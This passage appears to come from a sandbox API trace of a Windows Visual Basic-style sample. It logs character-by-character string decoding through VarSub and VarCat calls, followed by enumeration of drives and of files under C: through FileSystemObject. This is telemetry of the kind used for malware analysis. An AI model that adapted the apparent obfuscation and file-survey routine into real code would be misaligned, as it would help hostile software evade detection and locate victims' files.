lpUsedDefaultChar=0x0 | out: lpMultiByteStr="9\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.222] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=",", cbMultiByte=1, lpWideCharStr=0x1167dd4, cchWideChar=1 | out: lpWideCharStr=",") returned 1 [0173.222] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="D", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="D\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0173.227] VarSub (in: pvarLeft=0x28f860, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="7", cbMultiByte=1, lpWideCharStr=0x1167dec, cchWideChar=1 | out: lpWideCharStr="7") returned 1 [0173.227] VarCat (in: pvarLeft=0x28fa30, pvarRight=0x28f800, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0173.228] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22be0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f480*="drives", cNames=0x1, lcid=0x409, rgDispId=0x28f484 | out: rgDispId=0x28f484*=10010) returned 0x0 [0173.228] FileSystemObject:IDispatch:Invoke (in: This=0xf22be0, dispIdMember=10010, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f454*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f7bc, pExcepInfo=0x28f434, puArgErr=0x28f464 | out: pDispParams=0x28f454*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f7bc*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x40, varVal1=0xf22bc0, varVal2=0x0), pExcepInfo=0x28f434*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f464*=0x72a478d9) returned 0x0 [0173.228] FileSystemObject:IDispatch:Invoke (in: This=0xf22bc0, dispIdMember=-4, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f46c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f47c, pExcepInfo=0x28f44c, puArgErr=0x28f498 | out: pDispParams=0x28f46c*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f47c*(varType=0xd, wReserved1=0x7294, wReserved2=0x0, wReserved3=0x0, varVal1=0xf22c00, varVal2=0x0), pExcepInfo=0x28f44c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f498*=0x409) returned 0x0 [0173.229] FileSystemObject:IUnknown:QueryInterface (in: This=0xf22c00, riid=0x72970680*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28f714 | out: ppvObject=0x28f714*=0xf22c00) returned 0x0 [0173.229] FileSystemObject:IUnknown:Release (This=0xf22c00) returned 0x1 [0173.229] FileSystemObject:IEnumVARIANT:Next (in: This=0xf22c00, celt=0x1, rgvar=0x28f970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0173.229] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c30, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f480*="drivetype", cNames=0x1, lcid=0x409, rgDispId=0x28f484 | out: rgDispId=0x28f484*=10002) returned 0x0 [0173.230] VarCmp (pvarLeft=0x28f7bc, pvarRight=0x28f73c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0173.230] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c30, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f47c*="drivetype", cNames=0x1, lcid=0x409, rgDispId=0x28f480 | out: rgDispId=0x28f480*=10002) returned 0x0 [0173.231] VarCmp (pvarLeft=0x28f79c, pvarRight=0x28f72c, lcid=0x0, dwFlags=0x30001) returned 0x0 [0173.231] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c30, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f478*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f47c | out: rgDispId=0x28f47c*=0) returned 0x0 [0173.232] VarCmp (pvarLeft=0x28f77c, pvarRight=0x28f71c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0173.232] VarAnd (in: pvarLeft=0x28f78c, pvarRight=0x28f76c, pvarResult=0x28f75c | out: pvarResult=0x28f75c) returned 0x0 [0173.232] VarOr (in: pvarLeft=0x28f7ac, pvarRight=0x28f75c, pvarResult=0x28f74c | out: pvarResult=0x28f74c) returned 0x0 [0173.232] FileSystemObject:IEnumVARIANT:Next (in: This=0xf22c00, celt=0x1, rgvar=0x28f970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf22c30, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1 [0173.232] FileSystemObject:IUnknown:Release (This=0xf22c00) returned 0x0 [0173.232] FileSystemObject:IUnknown:Release (This=0xf22bc0) returned 0x1 [0173.233] FileSystemObject:IUnknown:Release (This=0xf22be0) returned 0x0 [0173.236] CLSIDFromProgIDEx (in: lpszProgID="scripting.filesystemobject", lpclsid=0x28f91c | out: lpclsid=0x28f91c*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0 [0173.236] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0173.236] CoCreateInstance (in: rclsid=0x28f91c*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x7295a460*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28f9c0 | out: ppv=0x28f9c0*=0xf22be0) returned 0x0 [0173.249] FileSystemObject:IUnknown:QueryInterface (in: This=0xf22be0, riid=0x72970540*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x28f9d0 | out: ppvObject=0x28f9d0*=0x0) returned 0x80004002 [0173.249] FileSystemObject:IUnknown:QueryInterface (in: This=0xf22be0, riid=0x72970750*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x28f9d4 | out: ppvObject=0x28f9d4*=0x0) returned 0x80004002 [0173.249] FileSystemObject:IUnknown:QueryInterface (in: This=0xf22be0, riid=0x72970450*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28f9a0 | out: ppvObject=0x28f9a0*=0xf22be0) returned 0x0 [0173.249] FileSystemObject:IUnknown:Release (This=0xf22be0) returned 0x1 [0173.249] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22be0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f97c*="drives", cNames=0x1, lcid=0x409, rgDispId=0x28f980 | out: rgDispId=0x28f980*=10010) returned 0x0 [0173.250] FileSystemObject:IDispatch:Invoke (in: This=0xf22be0, dispIdMember=10010, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f950*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28fa40, pExcepInfo=0x28f930, puArgErr=0x28f960 | out: pDispParams=0x28f950*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28fa40*(varType=0x9, wReserved1=0x0, wReserved2=0x85ec, wReserved3=0x116, varVal1=0xf22bc0, varVal2=0x0), pExcepInfo=0x28f930*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f960*=0x72a478d9) returned 0x0 [0173.250] FileSystemObject:IDispatch:Invoke (in: This=0xf22bc0, dispIdMember=-4, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f968*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f978, pExcepInfo=0x28f948, puArgErr=0x28f994 | out: pDispParams=0x28f968*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f978*(varType=0xd, wReserved1=0x7294, wReserved2=0x0, wReserved3=0x0, varVal1=0xf22c00, varVal2=0x0), pExcepInfo=0x28f948*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f994*=0x409) returned 0x0 [0173.250] FileSystemObject:IUnknown:QueryInterface (in: This=0xf22c00, riid=0x72970680*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28fa18 | out: ppvObject=0x28fa18*=0xf22c00) returned 0x0 [0173.251] FileSystemObject:IUnknown:Release (This=0xf22c00) returned 0x1 [0173.251] FileSystemObject:IEnumVARIANT:Next (in: This=0xf22c00, celt=0x1, rgvar=0x28fa60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0173.251] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c30, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f97c*="drivetype", cNames=0x1, lcid=0x409, rgDispId=0x28f980 | out: rgDispId=0x28f980*=10002) returned 0x0 [0173.252] VarCmp (pvarLeft=0x28fa40, pvarRight=0x28fa20, lcid=0x0, dwFlags=0x30001) returned 0x1 [0173.252] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c30, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f97c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f980 | out: rgDispId=0x28f980*=0) returned 0x0 [0173.253] CLSIDFromProgIDEx (in: lpszProgID="scripting.filesystemobject", lpclsid=0x28f5fc | out: lpclsid=0x28f5fc*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0 [0173.253] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0173.253] CoCreateInstance (in: rclsid=0x28f5fc*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x7295a460*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28f6a0 | out: ppv=0x28f6a0*=0xf22c80) returned 0x0 [0173.253] FileSystemObject:IUnknown:QueryInterface (in: This=0xf22c80, riid=0x72970540*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x28f6b0 | out: ppvObject=0x28f6b0*=0x0) returned 0x80004002 [0173.253] FileSystemObject:IUnknown:QueryInterface (in: This=0xf22c80, riid=0x72970750*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x28f6b4 | out: ppvObject=0x28f6b4*=0x0) returned 0x80004002 [0173.253] FileSystemObject:IUnknown:QueryInterface (in: This=0xf22c80, riid=0x72970450*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28f680 | out: ppvObject=0x28f680*=0xf22c80) returned 0x0 [0173.351] FileSystemObject:IUnknown:Release (This=0xf22c80) returned 0x1 [0173.352] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetFolder", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10013) returned 0x0 [0173.352] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10013, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x400c, wReserved1=0x0, wReserved2=0x85ec, wReserved3=0x116, varVal1=0x28fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x85ec, wReserved3=0x116, varVal1="C:", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x400c, wReserved1=0x0, wReserved2=0x85ec, wReserved3=0x116, varVal1=0x28fa40*(varType=0x8, wReserved1=0x0, wReserved2=0x85ec, wReserved3=0x116, varVal1="C:", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x9, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0xf2d5dc, varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0173.353] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf2d5dc, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="Files", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=10002) returned 0x0 [0173.353] FileSystemObject:IDispatch:Invoke (in: This=0xf2d5dc, dispIdMember=10002, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x9, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0xf22c70, varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0173.354] FileSystemObject:IDispatch:Invoke (in: This=0xf22c70, dispIdMember=-4, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f648*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f658, pExcepInfo=0x28f628, puArgErr=0x28f674 | out: pDispParams=0x28f648*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f658*(varType=0xd, wReserved1=0x7294, wReserved2=0x0, wReserved3=0x0, varVal1=0xf2d638, varVal2=0x0), pExcepInfo=0x28f628*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f674*=0x409) returned 0x0 [0173.354] FileSystemObject:IUnknown:QueryInterface (in: This=0xf2d638, riid=0x72970680*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28f88c | out: ppvObject=0x28f88c*=0xf2d638) returned 0x0 [0173.354] FileSystemObject:IUnknown:Release (This=0xf2d638) returned 0x1 [0173.354] FileSystemObject:IEnumVARIANT:Next (in: This=0xf2d638, celt=0x1, rgvar=0x28f984*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0173.355] RtlReAllocateHeap (Heap=0x10d0000, Flags=0x0, Ptr=0x10e1d20, Size=0x18) returned 0x10e2b78 [0173.355] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 1 [0173.356] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x1, lParam=0x28f54c) returned 0x0 [0173.356] IsWindow (hWnd=0x103bc) returned 1 [0173.356] GetWindowLongA (hWnd=0x103bc, nIndex=-16) returned 1140916224 [0173.356] IsIconic (hWnd=0x103b8) returned 0 [0173.356] GetParent (hWnd=0x103bc) returned 0x103b8 [0173.356] TranslateMessage (lpMsg=0x28f5e8) returned 0 [0173.357] DispatchMessageA (lpMsg=0x28f5e8) returned 0x0 [0173.357] KillTimer (hWnd=0x103bc, uIDEvent=0x103bc) returned 1 [0173.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.358] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0173.358] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.359] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0173.359] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.360] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0173.360] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.361] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0173.361] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.361] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0173.362] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.362] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0173.367] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.367] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0173.368] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.368] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0173.368] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.369] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0173.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0173.369] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: 